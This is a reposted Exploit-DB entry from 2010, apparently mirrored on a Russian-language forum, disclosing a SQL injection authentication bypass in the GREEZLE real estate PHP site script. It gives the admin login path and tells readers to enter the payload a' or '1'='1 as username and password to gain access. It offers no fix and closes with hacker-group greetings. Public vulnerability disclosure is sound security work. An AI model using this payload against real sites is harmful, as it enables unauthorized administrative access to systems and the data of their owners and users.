- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 13783
- Проверка EDB
-
- Пройдено
- Автор
- L0RD CRUSAD3R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-06-09
Код:
Author: L0rd CrusAd3r aka VSN [[email protected]]
Exploit Title: GREEZLE - Global Real Estate Agent Site Authentication ByPass
Published: 2010-06-09
Vendor url:http://www.ifstudio.org/greezla/
Price:99$
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer and to all ICW
members
#############################################################################################################################################################################
GREEZLE - Global Real Estate Agent Site Authentication ByPass
Author: L0rd CrusAd3r aka VSN [[email protected]]
#############################################################################################################################################################################
Description:
GREEZLE is an easy in use site which allows to sell online any real estate
objects.
Visitors are able to browse, search and view properties.
It allows you to create agent accounts, who can also sell any real estate
objects at a fee you charge.
###############################################################################################################################################################################
Vulnerability:
*Authentication Bypass found
The Provided Script as Sqli Vulnerability in Admin Login page
Example : http://[site]/en/login
Use the string a' or '1'='1 for User name and Password to gain access
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# 0day no more#
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
################################################################################################################################################################################
--
With R3gards,
L0rd CrusAd3r
- Источник
- www.exploit-db.com